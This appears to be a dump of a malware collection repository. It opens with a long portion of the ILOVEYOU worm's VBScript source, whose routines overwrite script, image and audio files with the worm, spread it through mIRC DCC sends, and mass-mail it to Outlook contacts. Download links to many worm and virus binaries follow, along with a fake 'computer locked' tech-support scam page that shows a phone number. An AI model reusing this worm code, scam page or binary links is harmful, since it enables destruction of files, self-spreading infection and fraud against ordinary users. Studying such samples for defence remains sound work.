s=lcase(f1.name) 89 | if (ext="vbs") or (ext="vbe") then 90 | set ap=fso.OpenTextFile(f1.path,2,true) 91 | ap.write vbscopy 92 | ap.close 93 | elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then 94 | set ap=fso.OpenTextFile(f1.path,2,true) 95 | ap.write vbscopy 96 | ap.close 97 | bname=fso.GetBaseName(f1.path) 98 | set cop=fso.GetFile(f1.path) 99 | cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) 100 | elseif(ext="jpg") or (ext="jpeg") then 101 | set ap=fso.OpenTextFile(f1.path,2,true) 102 | ap.write vbscopy 103 | ap.close 104 | set cop=fso.GetFile(f1.path) 105 | cop.copy(f1.path&".vbs") 106 | fso.DeleteFile(f1.path) 107 | elseif(ext="mp3") or (ext="mp2") then 108 | set mp3=fso.CreateTextFile(f1.path&".vbs") 109 | mp3.write vbscopy 110 | mp3.close 111 | set att=fso.GetFile(f1.path) 112 | att.attributes=att.attributes+2 113 | end if 114 | if (eq<>folderspec) then 115 | if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then 116 | set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]" 117 | scriptini.WriteLine ";mIRC Script" 118 | scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" 119 | scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" 120 | scriptini.WriteLine ";" 121 | scriptini.WriteLine ";Khaled Mardam-Bey" 122 | scriptini.WriteLine ";http://www.mirc.com" 123 | scriptini.WriteLine ";" 124 | scriptini.WriteLine "n0=on 1:JOIN:#:{" 125 | scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick 126 | "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" 127 | scriptini.WriteLine "n3=}" 128 | scriptini.close 129 | eq=folderspec 130 | end if 131 | end if 132 | next 133 | end sub 134 | sub folderlist(folderspec) 135 | On Error Resume Next 136 | dim f,f1,sf 137 | set f = fso.GetFolder(folderspec) 138 | set sf = f.SubFolders 139 | for each f1 in sf 140 | infectfiles(f1.path) 141 | folderlist(f1.path) 142 | next 143 | end sub 144 | sub regcreate(regkey,regvalue) 145 | Set regedit = CreateObject("WScript.Shell") 146 | regedit.RegWrite regkey,regvalue 147 | end sub 148 | function regget(value) 149 | Set regedit = CreateObject("WScript.Shell") 150 | regget=regedit.RegRead(value) 151 | end function 152 | function fileexist(filespec) 153 | On Error Resume Next 154 | dim msg 155 | if (fso.FileExists(filespec)) Then 156 | msg = 0 157 | else 158 | msg = 1 159 | end if 160 | fileexist = msg 161 | end function 162 | function folderexist(folderspec) 163 | On Error Resume Next 164 | dim msg 165 | if (fso.GetFolderExists(folderspec)) then 166 | msg = 0 167 | else 168 | msg = 1 169 | end if 170 | fileexist = msg 171 | end function 172 | sub spreadtoemail() 173 | On Error Resume Next 174 | dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad 175 | set regedit=CreateObject("WScript.Shell") 176 | set out=WScript.CreateObject("Outlook.Application") 177 | set mapi=out.GetNameSpace("MAPI") 178 | for ctrlists=1 to mapi.AddressLists.Count 179 | set a=mapi.AddressLists(ctrlists) 180 | x=1 181 | regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then 182 | regv=1 183 | end if 184 | if (int(a.AddressEntries.Count)>int(regv)) then 185 | for ctrentries=1 to a.AddressEntries.Count 186 | malead=a.AddressEntries(x) 187 | regad="" 188 | regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead ) 189 | if (regad="") then 190 | set male=out.CreateItem(0) 191 | male.Recipients.Add(malead) 192 | male.Subject = "ILOVEYOU" 193 | male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." 194 | male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send 195 | regedit.RegWrite 196 | "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if 197 | x=x+1 198 | next 199 | regedit.RegWrite 200 | "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else 201 | regedit.RegWrite 202 | "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if 203 | next 204 | Set out=Nothing 205 | Set mapi=Nothing 206 | end sub 207 | sub html 208 | On Error Resume Next 209 | dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 210 | dta1="LOVELETTER - HTML-?TITLE>"&vbcrlf& _ ""&vbcrlf& _ ""&vbcrlf& _ 214 | "-?HEAD>"&vbcrlf& _ 220 | "This HTML file need ActiveX Control-?p>To Enable to read this HTML file- Please press #-#YES#-# button to 221 | Enable ActiveX-?p>"&vbcrlf& _ 222 | "-?CENTER>----------z--------------------z-----------?MARQU EE> "&vbcrlf& _ 224 | "-?BODY>-?HTML>"&vbcrlf& _ 225 | " 199 | -------------------------------------------------------------------------------- /emailワーム/Silver/Silver.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/Silver/Silver.exe -------------------------------------------------------------------------------- /emailワーム/Trood.a.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/Trood.a.exe -------------------------------------------------------------------------------- /emailワーム/White.a.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/White.a.exe -------------------------------------------------------------------------------- /emailワーム/Winevar.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/Winevar.exe -------------------------------------------------------------------------------- /emailワーム/Xanax.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/Xanax.exe -------------------------------------------------------------------------------- /emailワーム/Yarner.a.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/Yarner.a.exe -------------------------------------------------------------------------------- /emailワーム/ZippedFiles.a.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/ZippedFiles.a.exe -------------------------------------------------------------------------------- /ウイルス/Floxif/Floxif.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ウイルス/Floxif/Floxif.exe -------------------------------------------------------------------------------- /ウイルス/Gnil/Gnil.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ウイルス/Gnil/Gnil.exe -------------------------------------------------------------------------------- /ウイルス/Mabezat/Mabezat.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ウイルス/Mabezat/Mabezat.exe -------------------------------------------------------------------------------- /ウイルス/MadMan.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ウイルス/MadMan.exe -------------------------------------------------------------------------------- /ウイルス/Melissa.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ウイルス/Melissa.doc -------------------------------------------------------------------------------- /ウイルス/Walker.com: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ウイルス/Walker.com -------------------------------------------------------------------------------- /ウイルス/Xpaj/xpaj.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ウイルス/Xpaj/xpaj.exe -------------------------------------------------------------------------------- /ウイルス/Xpaj/xpajB.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ウイルス/Xpaj/xpajB.exe -------------------------------------------------------------------------------- /ジョーク/457e2ff0c574450293784666d4cbf8ed93339dd7ee0144248aaef3054b247a1e.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/457e2ff0c574450293784666d4cbf8ed93339dd7ee0144248aaef3054b247a1e.exe -------------------------------------------------------------------------------- /ジョーク/Avoid.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/Avoid.exe -------------------------------------------------------------------------------- /ジョーク/AxInterop.ShockwaveFlashObjects.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/AxInterop.ShockwaveFlashObjects.dll -------------------------------------------------------------------------------- /ジョーク/BluescreenSimulator.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/BluescreenSimulator.exe -------------------------------------------------------------------------------- /ジョーク/ChilledWindows.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/ChilledWindows.exe -------------------------------------------------------------------------------- /ジョーク/Computer Shop.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/Computer Shop.exe -------------------------------------------------------------------------------- /ジョーク/CookieClickerHack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/CookieClickerHack.exe -------------------------------------------------------------------------------- /ジョーク/CrazyNCS.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/CrazyNCS.exe -------------------------------------------------------------------------------- /ジョーク/Curfun.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/Curfun.exe -------------------------------------------------------------------------------- /ジョーク/DefenderUninstallTool.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/DefenderUninstallTool.exe -------------------------------------------------------------------------------- /ジョーク/DesktopBoom.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/DesktopBoom.exe -------------------------------------------------------------------------------- /ジョーク/Document1.docx.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/Document1.docx.exe -------------------------------------------------------------------------------- /ジョーク/add_remove.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/add_remove.exe -------------------------------------------------------------------------------- /ジョーク/bomb.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/bomb.exe -------------------------------------------------------------------------------- /ジョーク/cd.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/cd.exe -------------------------------------------------------------------------------- /ジョーク/clickme.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/clickme.exe -------------------------------------------------------------------------------- /ジョーク/clippy.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/clippy.exe -------------------------------------------------------------------------------- /ジョーク/cmdchat.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/cmdchat.exe -------------------------------------------------------------------------------- /ジョーク/error byMist.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/error byMist.exe -------------------------------------------------------------------------------- /ジョークサイト/Fake Chrome Alert/css: -------------------------------------------------------------------------------- 1 | /* tamil */ 2 | @font-face { 3 | font-family: 'Catamaran'; 4 | font-style: normal; 5 | font-weight: 100; 6 | src: local('Catamaran Thin'), local('Catamaran-Thin'), url(https://fonts.gstatic.com/s/catamaran/v1/AsJXcel0VOprDS7k9OVAc-WS8h3n1nFPP5cmXoNgba8.woff2) format('woff2'); 7 | unicode-range: U+0964-0965, U+0B82-0BFA, U+200B-200D, U+20B9, U+25CC; 8 | } 9 | /* latin-ext */ 10 | @font-face { 11 | font-family: 'Catamaran'; 12 | font-style: normal; 13 | font-weight: 100; 14 | src: local('Catamaran Thin'), local('Catamaran-Thin'), url(https://fonts.gstatic.com/s/catamaran/v1/AsJXcel0VOprDS7k9OVAcyYE0-AqJ3nfInTTiDXDjU4.woff2) format('woff2'); 15 | unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF; 16 | } 17 | /* latin */ 18 | @font-face { 19 | font-family: 'Catamaran'; 20 | font-style: normal; 21 | font-weight: 100; 22 | src: local('Catamaran Thin'), local('Catamaran-Thin'), url(https://fonts.gstatic.com/s/catamaran/v1/AsJXcel0VOprDS7k9OVAc44P5ICox8Kq3LLUNMylGO4.woff2) format('woff2'); 23 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000; 24 | } 25 | /* tamil */ 26 | @font-face { 27 | font-family: 'Catamaran'; 28 | font-style: normal; 29 | font-weight: 400; 30 | src: local('Catamaran'), local('Catamaran-Regular'), url(https://fonts.gstatic.com/s/catamaran/v1/Q9cqF91R4Q6z47_V8UvFGBJtnKITppOI_IvcXXDNrsc.woff2) format('woff2'); 31 | unicode-range: U+0964-0965, U+0B82-0BFA, U+200B-200D, U+20B9, U+25CC; 32 | } 33 | /* latin-ext */ 34 | @font-face { 35 | font-family: 'Catamaran'; 36 | font-style: normal; 37 | font-weight: 400; 38 | src: local('Catamaran'), local('Catamaran-Regular'), url(https://fonts.gstatic.com/s/catamaran/v1/t_-OVtQ5f4U5rdYNmrStgxJtnKITppOI_IvcXXDNrsc.woff2) format('woff2'); 39 | unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF; 40 | } 41 | /* latin */ 42 | @font-face { 43 | font-family: 'Catamaran'; 44 | font-style: normal; 45 | font-weight: 400; 46 | src: local('Catamaran'), local('Catamaran-Regular'), url(https://fonts.gstatic.com/s/catamaran/v1/iVYgK2bOLvZcSxr0ITOecltXRa8TVwTICgirnJhmVJw.woff2) format('woff2'); 47 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000; 48 | } 49 | /* cyrillic-ext */ 50 | @font-face { 51 | font-family: 'Roboto'; 52 | font-style: normal; 53 | font-weight: 400; 54 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/ek4gzZ-GeXAPcSbHtCeQI_esZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 55 | unicode-range: U+0460-052F, U+20B4, U+2DE0-2DFF, U+A640-A69F; 56 | } 57 | /* cyrillic */ 58 | @font-face { 59 | font-family: 'Roboto'; 60 | font-style: normal; 61 | font-weight: 400; 62 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/mErvLBYg_cXG3rLvUsKT_fesZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 63 | unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116; 64 | } 65 | /* greek-ext */ 66 | @font-face { 67 | font-family: 'Roboto'; 68 | font-style: normal; 69 | font-weight: 400; 70 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/-2n2p-_Y08sg57CNWQfKNvesZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 71 | unicode-range: U+1F00-1FFF; 72 | } 73 | /* greek */ 74 | @font-face { 75 | font-family: 'Roboto'; 76 | font-style: normal; 77 | font-weight: 400; 78 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/u0TOpm082MNkS5K0Q4rhqvesZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 79 | unicode-range: U+0370-03FF; 80 | } 81 | /* vietnamese */ 82 | @font-face { 83 | font-family: 'Roboto'; 84 | font-style: normal; 85 | font-weight: 400; 86 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/NdF9MtnOpLzo-noMoG0miPesZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 87 | unicode-range: U+0102-0103, U+1EA0-1EF1, U+20AB; 88 | } 89 | /* latin-ext */ 90 | @font-face { 91 | font-family: 'Roboto'; 92 | font-style: normal; 93 | font-weight: 400; 94 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/Fcx7Wwv8OzT71A3E1XOAjvesZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 95 | unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF; 96 | } 97 | /* latin */ 98 | @font-face { 99 | font-family: 'Roboto'; 100 | font-style: normal; 101 | font-weight: 400; 102 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/CWB0XYA8bzo0kSThX0UTuA.woff2) format('woff2'); 103 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000; 104 | } 105 | /* cyrillic-ext */ 106 | @font-face { 107 | font-family: 'Roboto Mono'; 108 | font-style: normal; 109 | font-weight: 400; 110 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpYzTOQ_MqJVwkKsUn0wKzc2I.woff2) format('woff2'); 111 | unicode-range: U+0460-052F, U+20B4, U+2DE0-2DFF, U+A640-A69F; 112 | } 113 | /* cyrillic */ 114 | @font-face { 115 | font-family: 'Roboto Mono'; 116 | font-style: normal; 117 | font-weight: 400; 118 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpYzUj_cnvWIuuBMVgbX098Mw.woff2) format('woff2'); 119 | unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116; 120 | } 121 | /* greek-ext */ 122 | @font-face { 123 | font-family: 'Roboto Mono'; 124 | font-style: normal; 125 | font-weight: 400; 126 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpY0bcKLIaa1LC45dFaAfauRA.woff2) format('woff2'); 127 | unicode-range: U+1F00-1FFF; 128 | } 129 | /* greek */ 130 | @font-face { 131 | font-family: 'Roboto Mono'; 132 | font-style: normal; 133 | font-weight: 400; 134 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpY2o_sUJ8uO4YLWRInS22T3Y.woff2) format('woff2'); 135 | unicode-range: U+0370-03FF; 136 | } 137 | /* vietnamese */ 138 | @font-face { 139 | font-family: 'Roboto Mono'; 140 | font-style: normal; 141 | font-weight: 400; 142 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpY76up8jxqWt8HVA3mDhkV_0.woff2) format('woff2'); 143 | unicode-range: U+0102-0103, U+1EA0-1EF1, U+20AB; 144 | } 145 | /* latin-ext */ 146 | @font-face { 147 | font-family: 'Roboto Mono'; 148 | font-style: normal; 149 | font-weight: 400; 150 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpYyYE0-AqJ3nfInTTiDXDjU4.woff2) format('woff2'); 151 | unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF; 152 | } 153 | /* latin */ 154 | @font-face { 155 | font-family: 'Roboto Mono'; 156 | font-style: normal; 157 | font-weight: 400; 158 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpY44P5ICox8Kq3LLUNMylGO4.woff2) format('woff2'); 159 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000; 160 | } 161 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Chrome Alert/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Microsoft Security Error & Warning 5 | 6 | 7 | 8 | 9 | 10 | 11 | 97 | 98 | 116 | 117 | 118 | 119 | 120 | Your computer has been Locked 121 | Your computer with the IP address 182.44.57.91 has been infected by the Virus RDN/YahLover.worm!055BCCAC9FEC -- Because System Activation KEY has expired & Your information (for example, passwords, messages, and credit cards) have been stolen. Call the Technical Support number +1-800-385-4507 to protect your files and identity from further damage. 122 | 123 | 124 | 125 | 126 | 127 | Automatically report details of possible security incidents to Google. Privacy policy 128 | 129 | 130 | +1-800-385-4507 131 | Back to safety 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Chrome Alert/index2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Google Security Warning 5 | 6 | 7 | 8 | 9 | 10 | 96 | 97 | 115 | 116 | 117 | 118 | 119 | Your computer has been Locked 120 | Your computer with the IP address 182.54.97.91 has been infected by the Virus RDN/YahLover.worm!055BCCAC9FEC -- Because System Activation KEY has expired & Your information (for example, passwords, messages, and credit cards) have been stolen. Call the Technical Support number +1-800-385-4507 to protect your files and identity from further damage. 121 | 122 | 123 | 124 | 125 | 126 | Automatically report details of possible security incidents to Google. Privacy policy 127 | 128 | 129 | +1-800-385-4507 130 | Back to safety 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Chrome Alert/murphy_ie.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Chrome Alert/murphy_ie.zip -------------------------------------------------------------------------------- /ジョークサイト/Fake Chrome Alert/style.css: -------------------------------------------------------------------------------- 1 | /* tamil */ 2 | @font-face { 3 | font-family: 'Catamaran'; 4 | font-style: normal; 5 | font-weight: 100; 6 | src: local('Catamaran Thin'), local('Catamaran-Thin'), url(https://fonts.gstatic.com/s/catamaran/v1/AsJXcel0VOprDS7k9OVAc-WS8h3n1nFPP5cmXoNgba8.woff2) format('woff2'); 7 | unicode-range: U+0964-0965, U+0B82-0BFA, U+200B-200D, U+20B9, U+25CC; 8 | } 9 | /* latin-ext */ 10 | @font-face { 11 | font-family: 'Catamaran'; 12 | font-style: normal; 13 | font-weight: 100; 14 | src: local('Catamaran Thin'), local('Catamaran-Thin'), url(https://fonts.gstatic.com/s/catamaran/v1/AsJXcel0VOprDS7k9OVAcyYE0-AqJ3nfInTTiDXDjU4.woff2) format('woff2'); 15 | unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF; 16 | } 17 | /* latin */ 18 | @font-face { 19 | font-family: 'Catamaran'; 20 | font-style: normal; 21 | font-weight: 100; 22 | src: local('Catamaran Thin'), local('Catamaran-Thin'), url(https://fonts.gstatic.com/s/catamaran/v1/AsJXcel0VOprDS7k9OVAc44P5ICox8Kq3LLUNMylGO4.woff2) format('woff2'); 23 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000; 24 | } 25 | /* tamil */ 26 | @font-face { 27 | font-family: 'Catamaran'; 28 | font-style: normal; 29 | font-weight: 400; 30 | src: local('Catamaran'), local('Catamaran-Regular'), url(https://fonts.gstatic.com/s/catamaran/v1/Q9cqF91R4Q6z47_V8UvFGBJtnKITppOI_IvcXXDNrsc.woff2) format('woff2'); 31 | unicode-range: U+0964-0965, U+0B82-0BFA, U+200B-200D, U+20B9, U+25CC; 32 | } 33 | /* latin-ext */ 34 | @font-face { 35 | font-family: 'Catamaran'; 36 | font-style: normal; 37 | font-weight: 400; 38 | src: local('Catamaran'), local('Catamaran-Regular'), url(https://fonts.gstatic.com/s/catamaran/v1/t_-OVtQ5f4U5rdYNmrStgxJtnKITppOI_IvcXXDNrsc.woff2) format('woff2'); 39 | unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF; 40 | } 41 | /* latin */ 42 | @font-face { 43 | font-family: 'Catamaran'; 44 | font-style: normal; 45 | font-weight: 400; 46 | src: local('Catamaran'), local('Catamaran-Regular'), url(https://fonts.gstatic.com/s/catamaran/v1/iVYgK2bOLvZcSxr0ITOecltXRa8TVwTICgirnJhmVJw.woff2) format('woff2'); 47 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000; 48 | } 49 | /* cyrillic-ext */ 50 | @font-face { 51 | font-family: 'Roboto'; 52 | font-style: normal; 53 | font-weight: 400; 54 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/ek4gzZ-GeXAPcSbHtCeQI_esZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 55 | unicode-range: U+0460-052F, U+20B4, U+2DE0-2DFF, U+A640-A69F; 56 | } 57 | /* cyrillic */ 58 | @font-face { 59 | font-family: 'Roboto'; 60 | font-style: normal; 61 | font-weight: 400; 62 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/mErvLBYg_cXG3rLvUsKT_fesZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 63 | unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116; 64 | } 65 | /* greek-ext */ 66 | @font-face { 67 | font-family: 'Roboto'; 68 | font-style: normal; 69 | font-weight: 400; 70 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/-2n2p-_Y08sg57CNWQfKNvesZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 71 | unicode-range: U+1F00-1FFF; 72 | } 73 | /* greek */ 74 | @font-face { 75 | font-family: 'Roboto'; 76 | font-style: normal; 77 | font-weight: 400; 78 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/u0TOpm082MNkS5K0Q4rhqvesZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 79 | unicode-range: U+0370-03FF; 80 | } 81 | /* vietnamese */ 82 | @font-face { 83 | font-family: 'Roboto'; 84 | font-style: normal; 85 | font-weight: 400; 86 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/NdF9MtnOpLzo-noMoG0miPesZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 87 | unicode-range: U+0102-0103, U+1EA0-1EF1, U+20AB; 88 | } 89 | /* latin-ext */ 90 | @font-face { 91 | font-family: 'Roboto'; 92 | font-style: normal; 93 | font-weight: 400; 94 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/Fcx7Wwv8OzT71A3E1XOAjvesZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 95 | unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF; 96 | } 97 | /* latin */ 98 | @font-face { 99 | font-family: 'Roboto'; 100 | font-style: normal; 101 | font-weight: 400; 102 | src: local('Roboto'), local('Roboto-Regular'), 